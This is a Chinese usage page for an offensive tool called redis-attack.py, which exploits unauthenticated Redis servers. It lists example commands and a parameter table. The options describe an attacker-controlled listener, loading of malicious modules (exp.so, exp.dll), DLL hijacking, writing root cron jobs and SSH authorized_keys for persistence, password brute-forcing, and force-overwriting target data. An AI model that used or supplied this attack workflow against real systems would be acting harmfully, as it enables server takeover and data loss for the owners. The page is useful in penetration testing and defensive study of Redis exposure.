利用参考: 1.redis未授权利用方式
用法: python redis-attack.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-wf WINFILE] [-wf2 WINFILE2] [-lf LINUXFILE] [-lf2 LINUXFILE2] [-lf3 LINUXFILE3] [-a AUTH] [--brute] [-v]
示例:
python redis-attack.py -r 192.168.1.234 -L 192.168.1.2 --brute
python redis-attack.py -r 192.168.1.234 -L 192.168.1.2 -P 80 -b mypwd.txt -i
python redis-attack.py -r 192.168.1.234 -L 192.168.1.2 -lf3 id_rsa.pub
参数 | 描述 |
---|---|
-h, --help |
显示帮助信息并退出 |
-r RHOST, --rhost RHOST |
目标主机IP(必填) |
-p RPORT, --rport RPORT |
目标Redis端口,默认6379 |
-L LHOST, --lhost LHOST |
攻击服务器IP(必填) |
-P LPORT, --lport LPORT |
攻击服务器监听端口,默认16379 |
-wf WINFILE, --winfile WINFILE |
用于劫持Redis的DLL文件(Windows),默认exp/win/dbghelp.dll |
-wf2 WINFILE2, --winfile2 WINFILE2 |
要加载的Redis模块(Windows),默认exp/win/exp.dll |
-lf LINUXFILE, --linuxfile LINUXFILE |
要加载的Redis模块(Linux),默认exp/linux/exp.so |
-lf2 LINUXFILE2, --linuxfile2 LINUXFILE2 |
用于攻击Linux的定时任务文件(路径:/var/spool/cron/root ),默认exp/linux/exp.crontab (使用前需修改) |
-lf3 LINUXFILE3, --linuxfile3 LINUXFILE3 |
用于攻击Linux的SSH公钥文件(路径:/root/.ssh/authorized_keys ),需通过ssh-keygen -t rsa 生成,默认exp/linux/exp.authorized_keys (空文件,使用前需修改) |
-a AUTH, --auth AUTH |
Redis密码认证 |
-b [BRUTE], --brute [BRUTE] |
若Redis需要密码验证,执行暴力破解,默认字典pwd.txt |
-i, --idontcare |
忽略目标Redis上的数据(强制操作) |
-v, --verbose |
显示详细输出信息 |